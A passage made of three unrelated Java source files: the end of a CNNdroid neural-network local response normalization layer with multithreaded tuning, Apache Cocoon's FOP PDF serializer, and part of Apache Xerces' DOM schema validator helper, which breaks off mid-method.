outputBlob[n][c] = myNum.divide(inputBlob[n][c], myNum.power(myNum.sum(myNum.multiply(myNum.mean(myNum.power(inputBlob, n, c - (localSize - 1) / 2, c + (localSize - 1) / 2 + 1, h_i, w_i, 2)), (float) alpha), 1), beta));
}
return outputBlob;
}
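// Reference formula (Caffe-style across-channels LRN) that the dense expressions above
// implement, with zero padding at the channel borders:
//
//   out[n][c][h][w] = in[n][c][h][w] /
//       (1 + (alpha / localSize) * sum over c' in window(c) of in[n][c'][h][w]^2) ^ beta
//
// where window(c) spans localSize channels centred on c.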
///////////////////////////////////////Multithread//////////////////////////////////////////////
public float[][][][] lrnLayerMultithread(float[][][][] inputBlob, int localSize, double alpha,
double beta, String normRegion, int threadCount) {
// Calculate sizes.
int n_i = inputBlob.length;
int c_i = inputBlob[0].length;
int h_i = inputBlob[0][0].length;
int w_i = inputBlob[0][0][0].length;
// Initialize the result.
float[][][][] outputBlob = new float[n_i][c_i][h_i][w_i];
// Calculate the result.
if (normRegion.equals("across_channels"))
{
for (int frame = 0 ; frame < n_i ; frame++) {
// Calculate the result
MultiThreadLrn[] threads = new MultiThreadLrn[threadCount];
for (int thread = 0; thread < threadCount ; ++thread) {
threads[thread] = new MultiThreadLrn(inputBlob, frame, c_i, h_i, w_i, localSize, alpha, beta, myNum, thread, threadCount);
threads[thread].start();
}
while (true) {
int thread;
for (thread = 0; thread < threadCount ; thread++)
if (!threads[thread].done)
break;
if (thread == threadCount)
break;
try {
Thread.sleep(5);
} catch (InterruptedException e) {
e.printStackTrace();
}
}
for (int thread = 0; thread < threadCount ; ++thread) {
int channelCount = c_i / threadCount;
if (c_i % threadCount != 0)
channelCount += 1;
int cStart = thread * channelCount;
int cEnd = cStart + channelCount;
if (cStart > c_i)
cStart = c_i;
if (cEnd > c_i)
cEnd = c_i;
for (int c = cStart ; c < cEnd ; ++c)
outputBlob[frame][c]=threads[thread].outputBlob[c - cStart];
}
}
}
return outputBlob;
}
/////////////////////////////////////////Tuning Function////////////////////////////////////////
private Object tuneFunction(float[][][][] input){
Log.d("CNNdroid", "layers." + name + ": Tuning process is starting...");
long tuneTime = System.currentTimeMillis();
tuneNow = false;
long[] time = new long[threadCounts.length];
for (int i = 0 ; i < threadCounts.length ; i++)
time[i] = 0;
long temp;
int c_i = input[0].length;
float[][][][] tuneInput = new float[1][c_i][input[0][0].length][input[0][0][0].length];
tuneInput[0] = input[0];
Object output = null;
for (int i = 0; i < 4; i++) {
for (int thread = 0 ; thread < threadCounts.length ; thread++) {
temp = System.currentTimeMillis();
output = lrnLayerMultithread(input, localSize, alpha, beta, normRegion, threadCounts[thread]); // time each candidate thread count
time[thread] += System.currentTimeMillis() - temp;
}
}
int min = 0;
for (int i = 0; i < threadCounts.length ; i++)
if (time[i] <= time[min])
min = i;
threadCount = threadCounts[min];
writeFile(threadCount);
tuneTime = System.currentTimeMillis() - tuneTime;
Log.d("CNNdroid", "layers." + name + ": Tuning process finished in " + tuneTime + "ms.");
return output;
}
////////////////////////////////////////Local Functions/////////////////////////////////////////
private boolean corrupted(int threadCount)
{
for (int i = 0 ; i < threadCounts.length ; i++)
if (threadCount == threadCounts[i])
return false;
return true;
}
private void writeFile(int threadCount)
{
File f = new File(tuningFolder + "/" + name + ".txt");
if(f.exists())
f.delete();
try {
f.createNewFile();
FileOutputStream fos = new FileOutputStream(f);
fos.write(String.valueOf(threadCount).getBytes());
fos.close();
} catch (Exception e) {
e.printStackTrace();
}
}
}
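// Illustrative construction of this layer (parameter values are hypothetical,
// AlexNet-style LRN settings; the tuning folder path is a placeholder):
//
//   LayerInterface lrn = new LocalResponseNormalization(
//       5,                   // localSize
//       1e-4, 0.75,          // alpha, beta
//       "across_channels",   // normRegion
//       true,                // parallel
//       true,                // tuneFunc
//       "lrn1",              // name
//       "/sdcard/tuning");   // tuningFolder
//   float[][][][] out = (float[][][][]) lrn.compute(input);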
class MultiThreadLrn extends Thread {
private float[][][][] inputBlob;
private int frame, c_i, h_i, w_i, localSize;
private double alpha, beta;
private MyNum myNum;
private int cStart;
private int cEnd;
public float[][][] outputBlob;
public boolean done;
public MultiThreadLrn(float[][][][] inputBlob, int frame, int c_i, int h_i, int w_i, int localSize,
double alpha, double beta, MyNum myNum, int threadNum, int threadCount) {
this.inputBlob = inputBlob;
this.frame = frame;
this.c_i = c_i;
this.h_i = h_i;
this.w_i = w_i;
this.localSize = localSize;
this.alpha = alpha;
this.beta = beta;
this.myNum = myNum;
int channelCount = c_i / threadCount;
if (c_i % threadCount != 0)
channelCount += 1;
cStart = threadNum * channelCount;
cEnd = cStart + channelCount;
if (cStart > c_i)
cStart = c_i;
if (cEnd > c_i)
cEnd = c_i;
channelCount = cEnd - cStart;
outputBlob = new float[channelCount][h_i][w_i];
}
@Override
public void run() {
for (int c = cStart; c < cEnd ; ++c)
// For first few channels, do zero padding.
if (c < (localSize - 1) / 2)
outputBlob[c - cStart] = myNum.divide(inputBlob[frame][c], myNum.power(myNum.sum(myNum.multiply(myNum.sum(myNum.power(inputBlob, frame, 0, c + (localSize - 1) / 2 + 1, h_i, w_i, 2)), (float)alpha / localSize), 1), beta));
// For last few channels, do zero padding.
else if (c > c_i - (localSize - 1) / 2 - 1)
outputBlob[c - cStart] = myNum.divide(inputBlob[frame][c], myNum.power(myNum.sum(myNum.multiply(myNum.sum(myNum.power(inputBlob, frame, c - (localSize - 1) / 2, c_i, h_i, w_i, 2)), (float)alpha / localSize), 1), beta));
else
outputBlob[c - cStart] = myNum.divide(inputBlob[frame][c], myNum.power(myNum.sum(myNum.multiply(myNum.mean(myNum.power(inputBlob, frame, c - (localSize - 1) / 2, c + (localSize - 1) / 2 + 1, h_i, w_i, 2)), (float) alpha), 1), beta));
done = true;
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.cocoon.serialization;
import java.io.File;
import java.io.OutputStream;
import java.io.Serializable;
import java.net.MalformedURLException;
import java.util.HashMap;
import java.util.Map;
import org.apache.avalon.framework.CascadingRuntimeException;
import org.apache.avalon.framework.configuration.Configurable;
import org.apache.avalon.framework.configuration.Configuration;
import org.apache.avalon.framework.configuration.ConfigurationException;
import org.apache.avalon.framework.logger.Logger;
import org.apache.avalon.framework.service.ServiceException;
import org.apache.avalon.framework.service.ServiceManager;
import org.apache.avalon.framework.service.Serviceable;
import org.apache.excalibur.source.Source;
import org.apache.excalibur.source.SourceResolver;
import org.apache.excalibur.source.SourceValidity;
import org.apache.excalibur.source.impl.validity.NOPValidity;
import org.apache.fop.apps.Driver;
import org.apache.fop.apps.Options;
import org.apache.fop.configuration.ConfigurationParser;
import org.apache.fop.messaging.MessageHandler;
import org.apache.fop.render.Renderer;
import org.apache.cocoon.caching.CacheableProcessingComponent;
import org.apache.cocoon.components.renderer.ExtendableRendererFactory;
import org.apache.cocoon.components.renderer.RendererFactory;
import org.apache.cocoon.components.source.SourceUtil;
import org.apache.cocoon.core.container.spring.logger.LoggerUtils;
import org.apache.cocoon.util.ClassUtils;
import org.apache.cocoon.util.avalon.CLLoggerWrapper;
/**
* FOP 0.20.5 (and older) based serializer.
*
* @version $Id$
*/
public class FOPSerializer extends AbstractSerializer
implements Configurable, CacheableProcessingComponent, Serviceable {
/**
* The Renderer Factory to use
*/
protected static final RendererFactory factory = ExtendableRendererFactory.getRendererFactoryImplementation();
/**
* The <code>Driver</code> which is FOP.
*/
protected Driver driver;
/**
* The current <code>Renderer</code>.
*/
protected Renderer renderer;
/**
* The current <code>mime-type</code>.
*/
protected String mimetype;
/**
* The renderer name if configured
*/
protected String rendererName;
/**
* Should we set the content length?
*/
protected boolean setContentLength = true;
/**
* This Avalon logger is created for FOP
*/
protected Logger logger;
/**
* It is used to make sure that the default Options are loaded only once.
*/
private static boolean configured;
/**
* Manager to get URLFactory from.
*/
protected ServiceManager manager;
/**
* Set the component manager for this serializer.
*/
public void service(ServiceManager manager) throws ServiceException {
this.manager = manager;
this.logger = new CLLoggerWrapper(LoggerUtils.getChildLogger(manager, "fop"));
}
/**
* Set the configurations for this serializer.
*/
public void configure(Configuration conf) throws ConfigurationException {
MessageHandler.setScreenLogger(this.logger);
// FIXME: VG: Initialize static FOP configuration with defaults, only once.
// FOP has static config, but that's going to change in the near future.
// Then this code should be reviewed.
synchronized (FOPSerializer.class) {
if (!configured) {
try {
if (getLogger().isDebugEnabled()) {
getLogger().debug("Loading default configuration");
}
new Options();
} catch (Exception e) {
getLogger().error("Cannot load default configuration. Proceeding.", e);
}
configured = true;
}
}
this.setContentLength = conf.getChild("set-content-length").getValueAsBoolean(true);
// Old syntax: Attribute src of element user-config contains file
String configUrl = conf.getChild("user-config").getAttribute("src", null);
if (configUrl != null) {
getLogger().warn("Attribute src of user-config element is deprecated. "
+ "Provide Cocoon URI as value of the element instead");
try {
// VG: Old version of serializer supported only files
configUrl = new File(configUrl).toURL().toExternalForm();
} catch (MalformedURLException e) {
getLogger().warn("Can not load config file " + configUrl, e);
configUrl = null;
}
} else {
// New syntax: Element user-config contains URL
configUrl = conf.getChild("user-config").getValue(null);
}
if (configUrl != null) {
Source configSource = null;
SourceResolver resolver = null;
try {
resolver = (SourceResolver)this.manager.lookup(SourceResolver.ROLE);
configSource = resolver.resolveURI(configUrl);
if (getLogger().isDebugEnabled()) {
getLogger().debug("Loading configuration from " + configSource.getURI());
}
SourceUtil.toSAX(configSource, new ConfigurationParser());
} catch (Exception e) {
getLogger().warn("Cannot load configuration from " + configUrl);
throw new ConfigurationException("Cannot load configuration from " + configUrl, e);
} finally {
if (resolver != null) {
resolver.release(configSource);
manager.release(resolver);
}
}
}
// Get the mime type.
this.mimetype = conf.getAttribute("mime-type");
// Iterate through the parameters, looking for a renderer reference
Configuration[] parameters = conf.getChildren("parameter");
for (int i = 0; i < parameters.length; i++) {
String name = parameters[i].getAttribute("name");
if ("renderer".equals(name)) {
this.rendererName = parameters[i].getAttribute("value");
try {
this.renderer = (Renderer)ClassUtils.newInstance(rendererName);
} catch (Exception ex) {
getLogger().error("Cannot load class " + rendererName, ex);
throw new ConfigurationException("Cannot load class " + rendererName, ex);
}
}
}
if (this.renderer == null) {
// Using the Renderer Factory, get the default renderer
// for this MIME type.
this.renderer = factory.createRenderer(mimetype);
}
// Do we have a renderer yet?
if (this.renderer == null ) {
throw new ConfigurationException(
"Could not autodetect renderer for FOPSerializer and "
+ "no renderer was specified in the sitemap configuration."
);
}
Configuration confRenderer = conf.getChild("renderer-config");
if (confRenderer != null) {
parameters = confRenderer.getChildren("parameter");
if (parameters.length > 0) {
Map rendererOptions = new HashMap();
for (int i = 0; i < parameters.length; i++) {
String name = parameters[i].getAttribute("name");
String value = parameters[i].getAttribute("value");
if (getLogger().isDebugEnabled()) {
getLogger().debug("renderer " + String.valueOf(name) + " = " + String.valueOf(value));
}
rendererOptions.put(name,value);
}
this.renderer.setOptions(rendererOptions);
}
}
}
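// Illustrative sitemap declaration exercising the options parsed above. The element and
// attribute names (mime-type, set-content-length, user-config, parameter/renderer) are
// taken from this configure() method; the surrounding <map:serializer> wrapper and the
// example values follow common Cocoon sitemap usage and are illustrative only:
//
//   <map:serializer name="fo2pdf"
//                   src="org.apache.cocoon.serialization.FOPSerializer"
//                   mime-type="application/pdf">
//     <set-content-length>true</set-content-length>
//     <user-config>cocoon://fop-config.xml</user-config>
//     <parameter name="renderer" value="org.apache.fop.render.pdf.PDFRenderer"/>
//   </map:serializer>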
/**
* Return the MIME type.
*/
public String getMimeType() {
return mimetype;
}
/**
* Create the FOP driver
* Set the <code>OutputStream</code> where the XML should be serialized.
*/
public void setOutputStream(OutputStream out) {
// Give the source resolver to Batik which is used by FOP
//SourceProtocolHandler.setup(this.resolver);
// load the fop driver
this.driver = new Driver();
this.driver.setLogger(this.logger);
if (this.rendererName == null) {
this.renderer = factory.createRenderer(mimetype);
} else {
try {
this.renderer = (Renderer)ClassUtils.newInstance(this.rendererName);
} catch (Exception e) {
if (getLogger().isWarnEnabled()) {
getLogger().warn("Cannot load class " + this.rendererName, e);
}
throw new CascadingRuntimeException("Cannot load class " + this.rendererName, e);
}
}
this.driver.setRenderer(this.renderer);
this.driver.setOutputStream(out);
setContentHandler(this.driver.getContentHandler());
}
/**
* Generate the unique key.
* This key must be unique inside the space of this component.
* This method must be invoked before the generateValidity() method.
*
* @return The generated key or <code>0</code> if the component
* is currently not cacheable.
*/
public Serializable getKey() {
return "1";
}
/**
* Generate the validity object.
* Before this method can be invoked the generateKey() method
* must be invoked.
*
* @return The generated validity object or <code>null</code> if the
* component is currently not cacheable.
*/
public SourceValidity getValidity() {
return NOPValidity.SHARED_INSTANCE;
}
/**
* Recycle serializer by removing references
*/
public void recycle() {
super.recycle();
this.driver = null;
this.renderer = null;
}
/**
* Test if the component wants to set the content length
*/
public boolean shouldSetContentLength() {
return this.setContentLength;
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.xerces.jaxp.validation;
import java.io.IOException;
import java.util.Enumeration;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.transform.Result;
import javax.xml.transform.Source;
import javax.xml.transform.dom.DOMResult;
import javax.xml.transform.dom.DOMSource;
import org.apache.xerces.dom.NodeImpl;
import org.apache.xerces.impl.Constants;
import org.apache.xerces.impl.XMLErrorReporter;
import org.apache.xerces.impl.validation.EntityState;
import org.apache.xerces.impl.validation.ValidationManager;
import org.apache.xerces.impl.xs.XMLSchemaValidator;
import org.apache.xerces.impl.xs.util.SimpleLocator;
import org.apache.xerces.util.NamespaceSupport;
import org.apache.xerces.util.SymbolTable;
import org.apache.xerces.util.XMLAttributesImpl;
import org.apache.xerces.util.XMLSymbols;
import org.apache.xerces.xni.NamespaceContext;
import org.apache.xerces.xni.QName;
import org.apache.xerces.xni.XMLString;
import org.apache.xerces.xni.XNIException;
import org.apache.xerces.xni.parser.XMLParseException;
import org.w3c.dom.Attr;
import org.w3c.dom.CDATASection;
import org.w3c.dom.Comment;
import org.w3c.dom.Document;
import org.w3c.dom.DocumentType;
import org.w3c.dom.Entity;
import org.w3c.dom.NamedNodeMap;
import org.w3c.dom.Node;
import org.w3c.dom.ProcessingInstruction;
import org.w3c.dom.Text;
import org.xml.sax.SAXException;
/**
* <p>A validator helper for <code>DOMSource</code>s.</p>
*
* @author Michael Glavassevich, IBM
* @version $Id$
*/
final class DOMValidatorHelper implements ValidatorHelper, EntityState {
//
// Constants
//
/** Chunk size (1024). */
private static final int CHUNK_SIZE = (1 << 10);
/** Chunk mask (CHUNK_SIZE - 1). */
private static final int CHUNK_MASK = CHUNK_SIZE - 1;
// property identifiers
/** Property identifier: error reporter. */
private static final String ERROR_REPORTER =
Constants.XERCES_PROPERTY_PREFIX + Constants.ERROR_REPORTER_PROPERTY;
/** Property identifier: namespace context. */
private static final String NAMESPACE_CONTEXT =
Constants.XERCES_PROPERTY_PREFIX + Constants.NAMESPACE_CONTEXT_PROPERTY;
/** Property identifier: XML Schema validator. */
private static final String SCHEMA_VALIDATOR =
Constants.XERCES_PROPERTY_PREFIX + Constants.SCHEMA_VALIDATOR_PROPERTY;
/** Property identifier: symbol table. */
private static final String SYMBOL_TABLE =
Constants.XERCES_PROPERTY_PREFIX + Constants.SYMBOL_TABLE_PROPERTY;
/** Property identifier: validation manager. */
private static final String VALIDATION_MANAGER =
Constants.XERCES_PROPERTY_PREFIX + Constants.VALIDATION_MANAGER_PROPERTY;
/** Property identifier: xml schema version. */
private static final String XML_SCHEMA_VERSION =
Constants.XERCES_PROPERTY_PREFIX + Constants.XML_SCHEMA_VERSION_PROPERTY;
//
// Data
//
/** Error reporter. */
private final XMLErrorReporter fErrorReporter;
/** The namespace context of this document: stores namespaces in scope. **/
private final NamespaceSupport fNamespaceContext;
/** The namespace context of the DOMSource, includes context from ancestor nodes. **/
private final DOMNamespaceContext fDOMNamespaceContext = new DOMNamespaceContext();
/** Schema validator. **/
private final XMLSchemaValidator fSchemaValidator;
/** Symbol table **/
private final SymbolTable fSymbolTable;
/** Validation manager. **/
private final ValidationManager fValidationManager;
/** Component manager. **/
private final XMLSchemaValidatorComponentManager fComponentManager;
/** Simple Locator. **/
private final SimpleLocator fXMLLocator = new SimpleLocator(null, null, -1, -1, -1);
/** DOM document handler. **/
private DOMDocumentHandler fDOMValidatorHandler;
/** DOM result augmentor. **/
private final DOMResultAugmentor fDOMResultAugmentor = new DOMResultAugmentor(this);
/** DOM result builder. **/
private final DOMResultBuilder fDOMResultBuilder = new DOMResultBuilder();
/** Map for tracking unparsed entities. **/
private NamedNodeMap fEntities = null;
/** Array for holding character data. **/
private final char [] fCharBuffer = new char[CHUNK_SIZE];
/** Root node. **/
private Node fRoot;
/** Current element. **/
private Node fCurrentElement;
/** Fields for start element, end element, characters, comments and processing instructions. **/
final QName fElementQName = new QName();
final QName fAttributeQName = new QName();
final XMLAttributesImpl fAttributes = new XMLAttributesImpl();
final XMLString fTempString = new XMLString();
/** Flag indicating whether the schema version is 1.1. */
private final boolean fIsXSD11;
public DOMValidatorHelper(XMLSchemaValidatorComponentManager componentManager) {
fComponentManager = componentManager;
fErrorReporter = (XMLErrorReporter) fComponentManager.getProperty(ERROR_REPORTER);
fNamespaceContext = (NamespaceSupport) fComponentManager.getProperty(NAMESPACE_CONTEXT);
fSchemaValidator = (XMLSchemaValidator) fComponentManager.getProperty(SCHEMA_VALIDATOR);
fSymbolTable = (SymbolTable) fComponentManager.getProperty(SYMBOL_TABLE);
fValidationManager = (ValidationManager) fComponentManager.getProperty(VALIDATION_MANAGER);
fIsXSD11 = Constants.W3C_XML_SCHEMA11_NS_URI.equals(fComponentManager.getProperty(XML_SCHEMA_VERSION));
}
/*
* ValidatorHelper methods
*/
public void validate(Source source, Result result)
throws SAXException, IOException {
if (result instanceof DOMResult || result == null) {
final DOMSource domSource = (DOMSource) source;
final DOMResult domResult = (DOMResult) result;
Node node = domSource.getNode();
fRoot = node;
if (node != null) {
fComponentManager.reset();
fValidationManager.setEntityState(this);
fDOMNamespaceContext.reset();
String systemId = domSource.getSystemId();
fXMLLocator.setLiteralSystemId(systemId);
fXMLLocator.setExpandedSystemId(systemId);
fErrorReporter.setDocumentLocator(fXMLLocator);
try {
// regardless of what type of node this is, fire start and end document events
setupEntityMap((node.getNodeType() == Node.DOCUMENT_NODE) ? (Document) node : node.getOwnerDocument());
setupDOMResultHandler(domSource, domResult);
fSchemaValidator.startDocument(fXMLLocator, null, fDOMNamespaceContext, null);
validate(node);
fSchemaValidator.endDocument(null);
}
catch (XMLParseException e) {
throw Util.toSAXParseException(e);
}
catch (XNIException e) {
throw Util.toSAXException(e);
}
finally {
// Release references to application objects
fRoot = null;
fCurrentElement = null;
fEntities = null;
if (fDOMValidatorHandler != null) {
fDOMValidatorHandler.setDOMResult(null);
}
}
}
return;
}
throw new IllegalArgumentException(JAXPValidationMessageFormatter.formatMessage(fComponentManager.getLocale(),
"SourceResultMismatch",
new Object [] {source.getClass().getName(), result.getClass().getName()}));
}
/*
* EntityState methods
*/
public boolean isEntityDeclared(String name) {
return false;
}
public boolean isEntityUnparsed(String name) {
if (fEntities != null) {
Entity entity = (Entity) fEntities.getNamedItem(name);
if (entity != null) {
return (entity.getNotationName() != null);
}
}
return false;
}
/*
* Other methods
*/
/** Traverse the DOM and fire events to the schema validator. */
private void validate(Node node) {
final Node top = node;
final boolean useIsSameNode = useIsSameNode(top);
// Performs a non-recursive traversal of the DOM. This
// will avoid a stack overflow for DOMs with high depth.
while (node != null) {
beginNode(node);
Node next = node.getFirstChild();
while (next == null) {
finishNode(node);
if (top == node) {
break;
}
next = node.getNextSibling();
if (next == null) {
node = node.getParentNode();
if (node == null || ((useIsSameNode) ?
top.isSameNode(node) : top == node)) {
if (node != null) {
finishNode(node);
}
next = null;
break;
}
}
}
node = next;
}
}
/** Do processing for the start of a node. */
private void beginNode(Node node) {
switch (node.getNodeType()) {
case Node.ELEMENT_NODE:
fCurrentElement = node;
// push namespace context
fNamespaceContext.pushContext();
// start element
fillQName(fElementQName, node);
processAttributes(node.getAttributes());
fSchemaValidator.startElement(fElementQName, fAttributes, null);
break;
case Node.TEXT_NODE:
if (fDOMValidatorHandler != null) {
fDOMValidatorHandler.setIgnoringCharacters(true);
sendCharactersToValidator(node.getNodeValue());
fDOMValidatorHandler.setIgnoringCharacters(false);
fDOMValidatorHandler.characters((Text) node);
}
else {
sendCharactersToValidator(node.getNodeValue());
}
break;
case Node.CDATA_SECTION_NODE:
if (fDOMValidatorHandler != null) {
fDOMValidatorHandler.setIgnoringCharacters(true);
fSchemaValidator.startCDATA(null);
sendCharactersToValidator(node.getNodeValue());
fSchemaValidator.endCDATA(null);
fDOMValidatorHandler.setIgnoringCharacters(false);
fDOMValidatorHandler.cdata((CDATASection) node);
}
else {
fSchemaValidator.startCDATA(null);
sendCharactersToValidator(node.getNodeValue());
fSchemaValidator.endCDATA(null);
}
break;
case Node.PROCESSING_INSTRUCTION_NODE:
// The XSD 1.0 validator does nothing with processing instructions so bypass it unless it's 1.1.
if (fIsXSD11) {
fillXMLString(fTempString, node.getNodeValue());
fSchemaValidator.processingInstruction(node.getNodeName(), fTempString, null);
}
// Send the ProcessingInstruction node directly to the result builder.
if (fDOMValidatorHandler != null) {
fDOMValidatorHandler.processingInstruction((ProcessingInstruction) node);
}
break;
case Node.COMMENT_NODE:
// The XSD 1.0 validator does nothing with comments so bypass it unless it's 1.1.
if (fIsXSD11) {
fillXMLString(fTempString, node.getNodeValue());
fSchemaValidator.comment(fTempString, null);
}
// Send the Comment node directly to the result builder.
if (fDOMValidatorHandler != null) {
fDOMValidatorHandler.comment((Comment) node);
}
break;
case Node.DOCUMENT_TYPE_NODE:
/**
* Send the DocumentType node directly to the result builder.
*/
if (fDOMValidatorHandler != null) {
fDOMValidatorHandler.doctypeDecl((DocumentType) node);
}
break;
default: // Ignore other node types.
break;
}
}
/** Do processing for the end of a node. */
private void finishNode(Node node) {
if (node.getNodeType() == Node.ELEMENT_NODE) {
fCurrentElement = node;
// end element
fillQName(fElementQName, node);
fSchemaValidator.endElement(fElementQName, null);
// pop namespace context
fNamespaceContext.popContext();
}
}
/**
* Extracts NamedNodeMap of entities. We need this to validate
* elements and attributes of type xs:ENTITY, xs:ENTITIES or
* types derived from them.
*/
private void setupEntityMap(Document doc) {
if (doc != null) {
DocumentType docType = doc.getDoctype();
if (docType != null) {
fEntities = docType.getEntities();
return;
}
}
fEntities = null;
}
/**
* Sets up handler for <code>DOMResult</code>.
*/
private void setupDOMResultHandler(DOMSource source, DOMResult result) throws SAXException {
// If there's no DOMResult, unset the validator handler
if (result == null) {
fDOMValidatorHandler = null;
fSchemaValidator.setDocumentHandler(null);
return;
}
final Node nodeResult = result.getNode();
// If the source node and result node are the same use the DOMResultAugmentor.
// Otherwise use the DOMResultBuilder.
if (source.getNode() == nodeResult) {
fDOMValidatorHandler = fDOMResultAugmentor;
fDOMResultAugmentor.setDOMResult(result);
fSchemaValidator.setDocumentHandler(fDOMResultAugmentor);
return;
}
if (result.getNode() == null) {
try {
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setNamespaceAware(true);
DocumentBuilder builder = factory.newDocumentBuilder();
result.setNode(builder.newDocument());
}
catch (ParserConfigurationException e) {
throw new SAXException(e);
}
}
fDOMValidatorHandler = fDOMResultBuilder;
fDOMResultBuilder.setDOMResult(result);
fSchemaValidator.setDocumentHandler(fDOMResultBuilder);
}
private void fillQName(QName toFill, Node node) {
final String prefix = node.getPrefix();
final String localName = node.getLocalName();
final String rawName = node.getNodeName();
final String namespace = node.getNamespaceURI();
toFill.prefix = (prefix != null) ? fSymbolTable.addSymbol(prefix) : XMLSymbols.EMPTY_STRING;
toFill.localpart = (localName != null) ? fSymbolTable.addSymbol(localName) : XMLSymbols.EMPTY_STRING;
toFill.rawname = (rawName != null) ? fSymbolTable.addSymbol(rawName) : XMLSymbols.EMPTY_STRING;
toFill.uri = (namespace != null && namespace.length() > 0) ? fSymbolTable.addSymbol(namespace) : null;
}
private void processAttributes(NamedNodeMap attrMap) {
final int attrCount = attrMap.getLength();
fAttributes.removeAllAttributes();
for (int i = 0; i < attrCount; ++i) {
Attr attr = (Attr) attrMap.item(i);
String value = attr.getValue();
if (value == null) {
value = XMLSymbols.EMPTY_STRING;
}
fillQName(fAttributeQName, attr);
// REVISIT: Assuming all attributes are of type CDATA. The actual type may not matter. -- mrglavas
fAttributes.addAttributeNS(fAttributeQName, XMLSymbols.fCDATASymbol, value);
fAttributes.setSpecified(i, attr.getSpecified());
// REVISIT: Should we be looking at non-namespace attributes
// for additional mappings? Should we detect illegal namespace
// declarations and exclude them from the context? -- mrglavas
if (fAttributeQName.uri == NamespaceContext.XMLNS_URI) {
// process namespace attribute
if (fAttributeQName.prefix == XMLSymbols.PREFIX_XMLNS) {
fNamespaceContext.declarePrefix(fAttributeQName.localpart, value.length() != 0 ? fSymbolTable.addSymbol(value) : null);
}
else {
fNamespaceContext.declarePrefix(XMLSymbols.EMPTY_STRING, value.length() != 0 ? fSymbolTable.addSymbol(value) : null);
}
}
}
}
private void sendCharactersToValidator(String str) {
if (str != null) {
final int length = str.length();
final int remainder = length & CHUNK_MASK;
if (remainder > 0) {
str.getChars(0, remainder, fCharBuffer, 0);
fTempString.setValues(fCharBuffer, 0, remainder);
fSchemaValidator.characters(fTempString, null);
}
int i = remainder;
while (i < length) {
str.getChars(i, i += CHUNK_SIZE, fCharBuffer, 0);
fTempString.setValues(fCharBuffer, 0, CHUNK_SIZE);
fSchemaValidator.characters(fTempString, null);
}
}
}
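// Worked example of the chunking above: for a 2500-character string,
// remainder = 2500 & 1023 = 452, so a 452-char chunk is sent first, followed by two
// full 1024-char chunks covering positions 452..1475 and 1476..2499.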
private void fillXMLString(XMLString toFill, String str) {
final int length = str.length();
final char[] strArray;
if (length <= fCharBuffer.length) {
str.getChars(0, length, fCharBuffer, 0);
strArray = fCharBuffer;
}
else {
strArray = str.toCharArray();
}
toFill.setValues(strArray, 0, length);
}
/**
* Use isSameNode() for testing node identity if the DOM implementation
* supports DOM Level 3 core and it isn't the Xerces implementation.
*/
private boolean useIsSameNode(Node node) {
if (node instanceof NodeImpl) {
return false;
}
Document doc = node.getNodeType() == Node.DOCUMENT_NODE
? (Document) node : node.getOwnerDocument();
return (doc != null && doc.getImplementation().hasFeature("Core", "3.0"));
}
/**
* Returns the current element node.
*/
Node getCurrentElement() {
return fCurrentElement;
}
/**
* NamespaceContext for the DOMSource, includes context for ancestor nodes.
*/
final class DOMNamespaceContext implements NamespaceContext {
//
// Data
//
/**
* Namespace binding information. This array is composed of a
* series of tuples containing the namespace binding information:
* <prefix, uri>.
*/
protected String[] fNamespace = new String[16 * 2];
/** The size of the namespace information array. */
protected int fNamespaceSize = 0;
/**
* Flag indicating whether the namespace context
* has been built from the root node's ancestors.
*/
protected boolean fDOMContextBuilt = false;
//
// Methods
//
public void pushContext() {
fNamespaceContext.pushContext();
}
public void popContext() {
fNamespaceContext.popContext();
}
public boolean declarePrefix(String prefix, String uri) {
return fNamespaceContext.declarePrefix(prefix, uri);
}
public String getURI(String prefix) {
String uri = fNamespaceContext.getURI(prefix);
if (uri == null) {
if (!fDOMContextBuilt) {
fillNamespaceContext();
fDOMContextBuilt = true;
}
if (fNamespaceSize > 0 &&
!fNamespaceContext.containsPrefix(prefix)) {
uri = getURI0(prefix);
}
}
return uri;
}
public String getPrefix(String uri) {
return fNamespaceContext.getPrefix(uri);
}
public int getDeclaredPrefixCount() {
return fNamespaceContext.getDeclaredPrefixCount();
}
public String getDeclaredPrefixAt(int index) {
return fNamespaceContext.getDeclaredPrefixAt(index);
}
public Enumeration getAllPrefixes() {
return fNamespaceContext.getAllPrefixes();
}
public void reset() {
fDOMContextBuilt = false;
fNamespaceSize = 0;
}
private void fillNamespaceContext() {
if (fRoot != null) {
Node currentNode = fRoot.getParentNode();
while (currentNode != null) {
if (Node.ELEMENT_NODE == currentNode.getNodeType()) {
NamedNodeMap attributes = currentNode.getAttributes();
final int attrCount = attributes.getLength();
for (int i = 0; i < attrCount; ++i) {
Attr attr = (Attr) attributes.item(i);
String value = attr.getValue();
if (value == null) {
value = XMLSymbols.EMPTY_STRING;
}
fillQName(fAttributeQName, attr);
// REVISIT: Should we be looking at non-namespace attributes
// for additional mappings? Should we detect illegal namespace
// declarations and exclude them from the context? -- mrglavas
if (fAttributeQName.uri == NamespaceContext.XMLNS_URI) {
// process namespace attribute
if (fAttributeQName.prefix == XMLSymbols.PREFIX_XMLNS) {
declarePrefix0(fAttributeQName.localpart, value.length() != 0 ? fSymbolTable.addSymbol(value) : null);
}
else {
